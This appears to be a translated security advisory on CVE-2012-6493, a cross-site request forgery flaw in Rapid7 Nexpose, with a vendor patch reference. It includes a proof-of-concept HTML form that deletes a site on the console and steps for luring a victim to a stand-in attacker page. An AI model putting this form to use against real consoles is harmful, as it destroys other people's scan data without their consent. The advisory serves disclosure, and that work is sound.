Multiple Cross-Site Request Forgery vulnerabilities in Rapid7 Nexpose

Release date:
Updated on:

Affected Systems:
Rapid7 Nexpose <5.5.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57150
CVE (CAN) ID: CVE-2012-6493
 
Nexpose is a vulnerability management software.
 
In versions earlier than Nexpose 5.5.4, The refer domain of each URL is not correctly checked. If a remote attacker obtains the cookie of a legal user in some way, you can delete scan data and sites as valid users.
 
<* Source: Robert Gilbert

Link: http://seclists.org/bugtraq/2013/Jan/13
Https://community.rapid7.com/docs/DOC-2065#release5
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Exploit steps for proof-of-concept:
1. Create an external site/page: http://attackersite.com/nexpose-csrf.htm that contains:
[Code]
<Html>
<! -- Nexpose CSRF PoC -->
<Body>
<Form action = "https: // nexpose-security-console-site: 3780/data/site/delete? Siteid = 1 "; method =" POST "enctype =" multipart/form-data ">
<Input type = "submit" value = "delete site"/>
</Form>
<Script>
// Document. forms [0]. submit (); // uncomment to auto-submit
</Script>
</Body>
</Html>
[/Code]
2. Lure victim to http://attackersite.com/nexpose-csrf.htm.
3. Site with ID 1 is deleted when form is submitted.

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Rapid7
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Https://community.rapid7.com/docs/DOC-2065#release5